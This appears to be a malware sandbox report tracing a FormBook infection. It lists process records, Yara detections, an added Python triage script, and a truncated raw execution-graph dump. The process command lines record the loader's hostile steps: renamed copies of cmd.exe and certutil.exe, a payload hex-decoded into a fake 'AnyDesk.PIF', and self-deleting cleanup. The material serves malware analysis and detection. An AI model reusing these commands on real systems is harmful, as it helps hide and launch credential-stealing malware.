                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:1
                                                                                                                                                                      Start time:07:22:07
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:07:22:08
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\extrac32.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                                                                                                                      Imagebase:0x7ff61e160000
                                                                                                                                                                      File size:35'328 bytes
                                                                                                                                                                      MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:07:22:08
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Users\Public\alpha.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                      Imagebase:0x7ff6e9420000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:07:22:08
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\extrac32.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                      Imagebase:0x7ff61e160000
                                                                                                                                                                      File size:35'328 bytes
                                                                                                                                                                      MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:07:22:08
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Users\Public\alpha.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                                                                                                      Imagebase:0x7ff6e9420000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:7
                                                                                                                                                                      Start time:07:22:08
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Users\Public\kn.exe
                                                                                                                                                                      Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
Imagebase:0x7ff685410000
File size:1'651'712 bytes
MD5 hash:F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:8
Start time:07:22:09
Start date:27/11/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
Imagebase:0x7ff6e9420000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:07:22:09
Start date:27/11/2024
Path:C:\Users\Public\kn.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
Imagebase:0x7ff685410000
File size:1'651'712 bytes
MD5 hash:F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:10
Start time:07:22:10
Start date:27/11/2024
Path:C:\Users\Public\Libraries\AnyDesk.PIF
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\AnyDesk.PIF
Imagebase:0x400000
File size:1'392'640 bytes
MD5 hash:A8AF2D572217E48EEEBDF7DD135F90CD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.1446631582.000000007F910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation:low
Has exited:true

Target ID:11
Start time:07:22:10
Start date:27/11/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Imagebase:0x7ff6e9420000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:07:22:10
Start date:27/11/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
Imagebase:0x7ff6e9420000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:07:22:17
Start date:27/11/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aoikokpI.cmd" "
Imagebase:0xa40000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:07:22:17
Start date:27/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:07:22:18
Start date:27/11/2024
Path:C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):true
Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Imagebase:0x2b0000
File size:352'768 bytes
MD5 hash:5F5105050FBE68E930486635C5557F84
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:07:22:18
Start date:27/11/2024
Path:C:\Windows\SysWOW64\SndVol.exe
Wow64 process (32bit):true
Commandline:C:\Windows\System32\SndVol.exe
Imagebase:0x730000
File size:226'712 bytes
MD5 hash:BD4A1CC3429ED1251E5185A72501839B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:18
                                                                                                                                                                      Start time:07:22:20
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                      Imagebase:0x7ff62d7d0000
                                                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:20
                                                                                                                                                                      Start time:07:22:25
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\SysWOW64\msdt.exe"
                                                                                                                                                                      Imagebase:0xfe0000
                                                                                                                                                                      File size:389'632 bytes
                                                                                                                                                                      MD5 hash:BAA4458E429E7C906560FE4541ADFCFB
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:21
                                                                                                                                                                      Start time:07:22:29
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:/c del "C:\Windows\SysWOW64\SndVol.exe"
                                                                                                                                                                      Imagebase:0xa40000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:22
                                                                                                                                                                      Start time:07:22:30
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true
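The process records above carry the indicators a responder actually triages: FormBook Yara hits inside executable memory of Windows system binaries (msdt.exe, explorer.exe) are the injection/hollowing evidence, and the cmd.exe child that runs `/c del` on a dropped copy is the loader's self-cleanup. The script below is an added example, not part of the Joe Sandbox report, that parses two of these records (copied into a constructed input) and emits those findings. It decodes the memory-dump file names under an assumption: that the first dotted field is the target ID in hex, the fourth the region base address and the fifth a Win32 PAGE_* protection value (0x40 = PAGE_EXECUTE_READWRITE); that layout is inferred from the values on this page, not a documented format.

```python
"""Triage Joe Sandbox process records for injection and self-cleanup indicators.

Added example; the dump-name field layout used below is an assumption inferred
from the report, not a documented Joe Sandbox format.
"""
import re
from pathlib import PureWindowsPath

# Documented Win32 memory-protection constants.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}

# Windows system binaries seen in this report; FormBook code living in their
# executable memory means code was injected into them.
SYSTEM_HOSTS = {"explorer.exe", "msdt.exe", "conhost.exe", "cmd.exe"}

# Constructed input: two records copied from the report's process list.
SAMPLE = """\
Target ID:20
Path:C:\\Windows\\SysWOW64\\msdt.exe
Commandline:"C:\\Windows\\SysWOW64\\msdt.exe"
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:false

Target ID:21
Path:C:\\Windows\\SysWOW64\\cmd.exe
Commandline:/c del "C:\\Windows\\SysWOW64\\SndVol.exe"
Has exited:true
"""

_RULE_RE = re.compile(r"Rule:\s*([^,]+),.*?Source:\s*(\S+\.sdmp)")
_DEL_RE = re.compile(r'/c\s+del\s+"?([^"]+?)"?\s*$', re.IGNORECASE)


def parse_dump_name(name):
    """Decode a memory-dump file name.

    Assumed layout (inferred from the report): field 0 = target ID (hex),
    field 3 = region base address (hex), field 4 = PAGE_* protection (hex).
    """
    fields = name.split(".")
    protect = int(fields[4], 16)
    return {
        "target_id": int(fields[0], 16),
        "base": int(fields[3], 16),
        "protect": protect,
        "protect_name": PAGE_PROTECT.get(protect, hex(protect)),
        "executable": protect in EXECUTABLE,
    }


def parse_report(text):
    """Split the key:value process list into one dict per Target ID block."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {"yara": []}
        for line in block.splitlines():
            line = line.strip()
            if line.startswith("•"):
                m = _RULE_RE.search(line)
                if m:
                    rec["yara"].append({"rule": m.group(1).strip(),
                                        "dump": parse_dump_name(m.group(2))})
            elif ":" in line:
                key, value = line.split(":", 1)
                rec[key.strip()] = value.strip()
        records.append(rec)
    return records


def triage(records):
    """Return findings: Yara hits (executable vs. not) and cmd.exe self-cleanup."""
    findings = []
    for rec in records:
        target = rec.get("Target ID", "?")
        image = PureWindowsPath(rec.get("Path", "")).name.lower()
        for hit in rec["yara"]:
            d = hit["dump"]
            kind = "injected_code" if d["executable"] and image in SYSTEM_HOSTS else "memory_hit"
            findings.append({"target": target, "image": image, "kind": kind,
                             "detail": f'{hit["rule"]} at 0x{d["base"]:X} ({d["protect_name"]})'})
        m = _DEL_RE.search(rec.get("Commandline", ""))
        if image == "cmd.exe" and m:
            findings.append({"target": target, "image": image, "kind": "self_cleanup",
                             "detail": f"deletes {m.group(1)}"})
    return findings


if __name__ == "__main__":
    for f in triage(parse_report(SAMPLE)):
        print(f'[{f["kind"]}] target {f["target"]} {f["image"]}: {f["detail"]}')
```

Run stand-alone it prints one line per finding; the PAGE_READWRITE hit in msdt.exe is reported separately from the PAGE_EXECUTE_READWRITE one because only the executable region proves code execution, while the RW hit only shows FormBook bytes present in memory.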


                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:5.4%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:30.6%
                                                                                                                                                                        Total number of Nodes:638
                                                                                                                                                                        Total number of Limit Nodes:23
                                                                                                                                                                        execution_graph: serialized node/edge data of the interactive Execution Graph (not reproduced; the dump is cut off at the end of this section). Recoverable from it: the entry node is 7ff6e9438d80, and the API calls labelled along the graph include Sleep, _amsg_exit, _initterm, _IsNonwritableInCurrentImage, GetCurrentThreadId, OpenThread, HeapSetInformation, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetThreadLocale, SetThreadLocale, VirtualQuery, VirtualFree, GetConsoleOutputCP, GetCPInfo, GetModuleHandleW, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, _setjmp, longjmp, _setmode, GetConsoleTitleW, SetConsoleTitleW, GetProcessHeap, RtlFreeHeap, GetLastError, _tell, _close, _dup2, memset, wcschr, wcscmp, wcsncmp, _wcsicmp, _wcsupr, wcsspn, towupper.
22492->22493 22494 7ff6e9435bb8 22493->22494 22495 7ff6e9435b48 GetConsoleTitleW 22493->22495 22497 7ff6e9435bbd GetConsoleTitleW 22494->22497 22498 7ff6e9435bf4 22494->22498 22622 7ff6e942cad4 22495->22622 22501 7ff6e942cad4 172 API calls 22497->22501 22500 7ff6e943f452 22498->22500 22504 7ff6e9435bfd 22498->22504 22505 7ff6e9433c24 166 API calls 22500->22505 22502 7ff6e9435bdb 22501->22502 22506 7ff6e94296e8 645 API calls 22502->22506 22508 7ff6e9435c1b 22504->22508 22509 7ff6e943f462 22504->22509 22504->22513 22505->22513 22507 7ff6e9435b7f 22506->22507 22512 7ff6e9435c3c SetConsoleTitleW 22507->22512 22510 7ff6e9423278 166 API calls 22508->22510 22511 7ff6e9423278 166 API calls 22509->22511 22510->22513 22511->22513 22512->22513 22513->22489 22515 7ff6e942c01c 22514->22515 22516 7ff6e942c0c4 22514->22516 22517 7ff6e942c086 22515->22517 22518 7ff6e942c022 22515->22518 22516->22445 22522 7ff6e942c144 22517->22522 22533 7ff6e942c094 22517->22533 22519 7ff6e942c030 22518->22519 22520 7ff6e942c113 22518->22520 22521 7ff6e942c039 wcschr 22519->22521 22535 7ff6e942c053 22519->22535 22531 7ff6e942ff70 2 API calls 22520->22531 22520->22535 22523 7ff6e942c301 22521->22523 22521->22535 22526 7ff6e942c151 22522->22526 22541 7ff6e942c1c8 22522->22541 22530 7ff6e942cd90 166 API calls 22523->22530 22524 7ff6e942c058 22536 7ff6e942ff70 2 API calls 22524->22536 22539 7ff6e942c073 22524->22539 22525 7ff6e942c0c6 22529 7ff6e942c0cf wcschr 22525->22529 22525->22539 22709 7ff6e942c460 22526->22709 22528 7ff6e942c460 183 API calls 22528->22533 22534 7ff6e942c1be 22529->22534 22529->22539 22551 7ff6e942c30b 22530->22551 22531->22535 22533->22516 22533->22528 22537 7ff6e942cd90 166 API calls 22534->22537 22535->22524 22535->22525 22543 7ff6e942c211 22535->22543 22536->22539 22537->22541 22538 7ff6e942c460 183 API calls 22538->22516 22539->22516 22540 7ff6e942c460 183 API calls 22539->22540 22540->22539 22541->22516 22542 7ff6e942c285 22541->22542 22541->22543 22548 7ff6e942d840 178 
API calls 22541->22548 22542->22543 22547 7ff6e942b6b0 170 API calls 22542->22547 22544 7ff6e942ff70 2 API calls 22543->22544 22544->22516 22545 7ff6e942d840 178 API calls 22545->22551 22546 7ff6e942b6b0 170 API calls 22546->22535 22549 7ff6e942c2ac 22547->22549 22548->22541 22549->22539 22549->22543 22550 7ff6e942c3d4 22550->22539 22550->22543 22550->22546 22551->22516 22551->22543 22551->22545 22551->22550 22553 7ff6e942ca40 17 API calls 22552->22553 22568 7ff6e942b162 22553->22568 22554 7ff6e942b2f7 ??_V@YAXPEAX 22555 7ff6e942b303 22554->22555 22557 7ff6e9438f80 7 API calls 22555->22557 22556 7ff6e942b1d9 22560 7ff6e942cd90 166 API calls 22556->22560 22575 7ff6e942b1ed 22556->22575 22559 7ff6e942b315 22557->22559 22558 7ff6e9431ea0 8 API calls 22558->22568 22559->22449 22559->22460 22560->22575 22562 7ff6e943bfef _get_osfhandle SetFilePointer 22565 7ff6e943c01d 22562->22565 22562->22575 22563 7ff6e942b228 _get_osfhandle 22564 7ff6e942b23f _get_osfhandle 22563->22564 22563->22575 22564->22575 22567 7ff6e94333f0 _vsnwprintf 22565->22567 22570 7ff6e943c038 22567->22570 22568->22556 22568->22558 22568->22568 22583 7ff6e942b2e1 22568->22583 22569 7ff6e94301b8 6 API calls 22569->22575 22574 7ff6e9423278 166 API calls 22570->22574 22571 7ff6e94333f0 _vsnwprintf 22571->22570 22572 7ff6e942d208 _close 22572->22575 22573 7ff6e94326e0 19 API calls 22573->22575 22576 7ff6e943c1f9 22574->22576 22575->22562 22575->22563 22575->22569 22575->22572 22575->22573 22578 7ff6e942b038 _dup2 22575->22578 22579 7ff6e943c060 22575->22579 22580 7ff6e943c246 22575->22580 22581 7ff6e943c1a5 22575->22581 22575->22583 22587 7ff6e942b356 22575->22587 22600 7ff6e943c1c3 22575->22600 22723 7ff6e942affc _dup 22575->22723 22725 7ff6e944f318 